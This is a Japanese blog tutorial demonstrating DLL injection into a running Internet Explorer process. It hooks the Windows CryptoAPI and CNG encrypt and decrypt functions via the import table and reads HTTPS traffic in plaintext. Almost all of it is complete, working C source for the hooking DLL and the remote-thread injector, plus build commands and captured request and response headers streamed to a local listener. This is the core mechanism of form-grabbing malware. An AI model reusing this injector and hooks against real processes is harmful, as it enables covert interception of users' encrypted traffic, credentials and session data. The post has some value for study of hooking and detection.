読者です 読者をやめる 読者になる 読者になる

DLL injectionでWindows APIによる暗号化処理を覗いてみる

「LD_PRELOAD injectionでOpenSSLによる暗号化処理を覗いてみる」では、Linux環境におけるOpenSSLを使った暗号化処理を覗いてみた。 ここでは、「IAT書き換えによるAPIフックをやってみる」と同様の方法にて、Windows環境におけるWindows APIを使った暗号化処理を覗いてみる。

環境

Windows 8.1 Pro 64 bit版、Visual Studio Community 2013 with Update 4

>systeminfo
OS 名:                  Microsoft Windows 8.1 Pro
OS バージョン:          6.3.9600 N/A ビルド 9600
OS ビルドの種類:        Multiprocessor Free
システムの種類:         x64-based PC
プロセッサ:             1 プロセッサインストール済みです。
                        [01]: Intel64 Family 6 Model 69 Stepping 1 GenuineIntel ~1596 Mhz

>cl
Microsoft (R) C/C++ Optimizing Compiler Version 18.00.31101 for x86

フックするDLLを作ってみる

暗号化処理に関するWindows APIには、古くからあるCryptoAPI系のものとVista以降で導入されたCNG系のものがある。 以下のリファレンスを参考に、フックするDLLのコードを書くと次のようになる。

/* hook_cryptoapi.c */
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <tlhelp32.h>              /* CreateToolhelp32Snapshot */
#include <Dbghelp.h>               /* ImageDirectoryEntryToData */
#include <Wincrypt.h>
#include <bcrypt.h>
#include <winsock2.h>
#include <ws2tcpip.h>
#pragma comment(lib, "Dbghelp")
#pragma comment(lib, "ws2_32")

void modifyIAT(char *modname, void *origaddr, void *newaddr);
void modifyIATonemod(char *modname, void *origaddr, void *newaddr, HMODULE hModule);

BOOL newCryptEncrypt(HCRYPTKEY hKey, HCRYPTHASH hHash, BOOL Final, DWORD dwFlags, BYTE *pbData, DWORD *pdwDataLen, DWORD dwBufLen);
BOOL newCryptDecrypt(HCRYPTKEY hKey, HCRYPTHASH hHash, BOOL Final, DWORD dwFlags, BYTE *pbData, DWORD *pdwDataLen);
NTSTATUS newBCryptEncrypt(BCRYPT_KEY_HANDLE hKey, PUCHAR pbInput, ULONG cbInput, VOID *pPaddingInfo, PUCHAR pbIV, ULONG cbIV, PUCHAR pbOutput, ULONG cbOutput, ULONG *pcbResult, ULONG dwFlags);
NTSTATUS newBCryptDecrypt(BCRYPT_KEY_HANDLE hKey, PUCHAR pbInput, ULONG cbInput, VOID *pPaddingInfo, PUCHAR pbIV, ULONG cbIV, PUCHAR pbOutput, ULONG cbOutput, ULONG *pcbResult, ULONG dwFlags);
FARPROC origCryptEncrypt;
FARPROC origCryptDecrypt;
FARPROC origBCryptEncrypt;
FARPROC origBCryptDecrypt;

WSADATA wsaData;
SOCKET s;

SOCKET create_connection(char *host, int port)
{
    WSAStartup(MAKEWORD(2, 2), &wsaData);
    SOCKET s = WSASocket(AF_INET, SOCK_STREAM, 0, NULL, 0, 0);
    SOCKADDR_IN name;
    name.sin_family = AF_INET;
    name.sin_addr.s_addr = inet_addr(host);
    name.sin_port = htons(port);
    connect(s, (SOCKADDR *)&name, sizeof(name));
    return s;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    HMODULE advapi32 = GetModuleHandle("advapi32");
    HMODULE bcrypt = GetModuleHandle("bcrypt");
    origCryptEncrypt = GetProcAddress(advapi32, "CryptEncrypt");
    origCryptDecrypt = GetProcAddress(advapi32, "CryptDecrypt");
    origBCryptEncrypt = GetProcAddress(bcrypt, "BCryptEncrypt");
    origBCryptDecrypt = GetProcAddress(bcrypt, "BCryptDecrypt");

    switch (fdwReason) {
      case DLL_PROCESS_ATTACH:
        s = create_connection("127.0.0.1", 5000);
        modifyIAT("advapi32.dll", origCryptEncrypt, newCryptEncrypt);
        modifyIAT("advapi32.dll", origCryptDecrypt, newCryptDecrypt);
        modifyIAT("bcrypt.dll", origBCryptEncrypt, newBCryptEncrypt);
        modifyIAT("bcrypt.dll", origBCryptDecrypt, newBCryptDecrypt);
        break;
      case DLL_PROCESS_DETACH:
        modifyIAT("advapi32.dll", newCryptEncrypt, origCryptEncrypt);
        modifyIAT("advapi32.dll", newCryptDecrypt, origCryptDecrypt);
        modifyIAT("bcrypt.dll", newBCryptEncrypt, origBCryptEncrypt);
        modifyIAT("bcrypt.dll", newBCryptDecrypt, origBCryptDecrypt);
        closesocket(s);
        break;
    }

    return TRUE;
}

void modifyIAT(char *modname, void *origaddr, void *newaddr)
{
    HANDLE hModuleSnap = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, GetCurrentProcessId());

    MODULEENTRY32 me;
    me.dwSize = sizeof(me);

    /* modify IAT in all loaded modules */
    BOOL bModuleResult = Module32First(hModuleSnap, &me);
    while (bModuleResult) {
        modifyIATonemod(modname, origaddr, newaddr, me.hModule);
        bModuleResult = Module32Next(hModuleSnap, &me);
    }

    CloseHandle(hModuleSnap);
}

void modifyIATonemod(char *modname, void *origaddr, void *newaddr, HMODULE hModule)
{
    ULONG ulSize;
    PIMAGE_IMPORT_DESCRIPTOR pImportDesc;
    pImportDesc = ImageDirectoryEntryToData(hModule, TRUE, IMAGE_DIRECTORY_ENTRY_IMPORT, &ulSize);
    if (pImportDesc == NULL) {
        return;
    }

    /* seek the target DLL */
    while (pImportDesc->Name) {
        char *name = (char*)hModule + pImportDesc->Name;
        if (lstrcmpi(name, modname) == 0) {
            break;
        }
        pImportDesc++;
    }
    if (pImportDesc->Name == 0) {
        return;
    }

    /* modify corrensponding IAT entry */
    PIMAGE_THUNK_DATA pThunk = (PIMAGE_THUNK_DATA)((char *)hModule + pImportDesc->FirstThunk);
    while (pThunk->u1.Function) {
        PROC *paddr = (PROC*)&pThunk->u1.Function;
        if (*paddr == origaddr) {
            DWORD flOldProtect;
            VirtualProtect(paddr, sizeof(paddr), PAGE_EXECUTE_READWRITE, &flOldProtect);
            *paddr = newaddr;
            VirtualProtect(paddr, sizeof(paddr), flOldProtect, &flOldProtect);
        }
        pThunk++;
    }
}

BOOL newCryptEncrypt(HCRYPTKEY hKey, HCRYPTHASH hHash, BOOL Final, DWORD dwFlags, BYTE *pbData, DWORD *pdwDataLen, DWORD dwBufLen)
{
    send(s, "[CryptEncrypt] ", 15, 0);
    send(s, pbData, dwBufLen, 0);
    send(s, "\n", 1, 0);
    return origCryptEncrypt(hKey, hHash, Final, dwFlags, pbData, pdwDataLen, dwBufLen);
}

BOOL newCryptDecrypt(HCRYPTKEY hKey, HCRYPTHASH hHash, BOOL Final, DWORD dwFlags, BYTE *pbData, DWORD *pdwDataLen)
{
    BOOL ret = origCryptDecrypt(hKey, hHash, Final, dwFlags, pbData, pdwDataLen);
    send(s, "[CryptDecrypt] ", 15, 0);
    send(s, pbData, *pdwDataLen, 0);
    send(s, "\n", 1, 0);
    return ret;
}

NTSTATUS newBCryptEncrypt(BCRYPT_KEY_HANDLE hKey, PUCHAR pbInput, ULONG cbInput, VOID *pPaddingInfo, PUCHAR pbIV, ULONG cbIV, PUCHAR pbOutput, ULONG cbOutput, ULONG *pcbResult, ULONG dwFlags)
{
    send(s, "[BCryptEncrypt] ", 16, 0);
    send(s, pbInput, cbInput, 0);
    send(s, "\n", 1, 0);
    return origBCryptEncrypt(hKey, pbInput, cbInput, pPaddingInfo, pbIV, cbIV, pbOutput, cbOutput, pcbResult, dwFlags);
}

NTSTATUS newBCryptDecrypt(BCRYPT_KEY_HANDLE hKey, PUCHAR pbInput, ULONG cbInput, VOID *pPaddingInfo, PUCHAR pbIV, ULONG cbIV, PUCHAR pbOutput, ULONG cbOutput, ULONG *pcbResult, ULONG dwFlags)
{
    NTSTATUS ret = origBCryptDecrypt(hKey, pbInput, cbInput, pPaddingInfo, pbIV, cbIV, pbOutput, cbOutput, pcbResult, dwFlags);
    send(s, "[BCryptDecrypt] ", 16, 0);
    send(s, pbOutput, *pcbResult, 0);
    send(s, "\n", 1, 0);
    return ret;
}

上のコードでは、ローカルホストのTCPの5000番ポートに接続し、ログを送信する。

次に、上のDLLをDLL injectionするコードを書くと次のようになる。

/* injector.c */
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <winsock2.h>
#include <ws2tcpip.h>
#include <stdio.h>
#pragma comment(lib, "ws2_32")

WSADATA wsaData;

SOCKET listen_connection(int port)
{
    SOCKADDR_IN name;
    BOOL yes = 1;

    WSAStartup(MAKEWORD(2, 2), &wsaData);
    SOCKET s = WSASocket(AF_INET, SOCK_STREAM, 0, NULL, 0, 0);
    setsockopt(s, SOL_SOCKET, SO_REUSEADDR, (const char *)&yes, sizeof(yes));
    name.sin_family = AF_INET;
    name.sin_addr.s_addr = INADDR_ANY;
    name.sin_port = htons(port);
    bind(s, (SOCKADDR *)&name, sizeof(name));
    listen(s, 5);
    puts("[+] listening on 0.0.0.0 port 5000");
    return s;
}

VOID interact(SOCKET s)
{
    SOCKET c = accept(s, NULL, NULL);
    closesocket(s);
    puts("[+] connection accepted");

    char buf[8192];
    while (1) {
        int size = recv(c, buf, 8192, 0);
        if (size == 0) {
            break;
        }
        fwrite(buf, size, 1, stdout);
    }

    closesocket(c);
}

int main(int argc, char *argv[])
{
    SOCKET s = listen_connection(5000);

    char dllpath[] = "C:\\Users\\user\\Desktop\\test\\hook_cryptoapi.dll";

    int pid = atoi(argv[1]);

    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    void *datamemory = VirtualAllocEx(hProcess, NULL, sizeof(dllpath), MEM_COMMIT, PAGE_READWRITE);
    WriteProcessMemory(hProcess, datamemory, (void *)dllpath, sizeof(dllpath), NULL);

    HMODULE kernel32 = GetModuleHandle("kernel32");
    FARPROC loadlibrary = GetProcAddress(kernel32, "LoadLibraryA");
    HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)loadlibrary, datamemory, 0, NULL);
    if (!hThread) {
        /* 32 bit (WOW64) -> 64 bit (Native) won't work */
        char errmsg[512];
        FormatMessage(FORMAT_MESSAGE_FROM_SYSTEM, NULL, GetLastError(), 0, errmsg, sizeof(errmsg), NULL);
        printf("%hs", errmsg);
        return 1;
    }
    WaitForSingleObject(hThread, INFINITE);

    CloseHandle(hThread);
    VirtualFreeEx(hProcess, datamemory, sizeof(dllpath), MEM_RELEASE);

    interact(s);
    return 0;
}

上のコードでは、TCPの5000番ポートを待ち受け、受信した文字列をコンソールに出力する。

それぞれのコードをコンパイルし、Internet ExplorerのプロセスにDLL injectionを行った後、https://www.example.com/へアクセスすると次のようになる。

>cl hook_cryptoapi.c /LD

>cl injector.c

>tasklist

イメージ名                     PID セッション名     セッション# メモリ使用量
========================= ======== ================ =========== ============
System Idle Process              0 Services                   0          4 K
System                           4 Services                   0     10,836 K
(snip)
iexplore.exe                  5560 Console                    1     26,436 K
iexplore.exe                  6536 Console                    1    138,760 K
SearchProtocolHost.exe        9180 Console                    1      7,396 K
tasklist.exe                  7232 Console                    1      5,960 K

>injector.exe 6536
[+] listening on 0.0.0.0 port 5000
[+] connection accepted
[BCryptEncrypt] GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: ja
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; MANMJS; rv:11.0) li
ke Gecko
Accept-Encoding: gzip, deflate
Host: www.example.com
Connection: Keep-Alive
Cache-Control: no-cache

(snip)
[BCryptDecrypt] HTTP/1.1 200 OK
Content-Encoding: gzip
Cache-Control: max-age=604800
Content-Type: text/html
Date: Mon, 14 Mar 2016 13:08:19 GMT
Etag: "359670651+gzip"
Expires: Mon, 21 Mar 2016 13:08:19 GMT
Last-Modified: Fri, 09 Aug 2013 23:54:35 GMT
Server: ECS (rhv/8199)
Vary: Accept-Encoding
X-Cache: HIT
x-ec-custom-error: 1
Content-Length: 606

(snip)

上の結果から、暗号化前および復号後の内容が取得できていることが確認できる。

関連リンク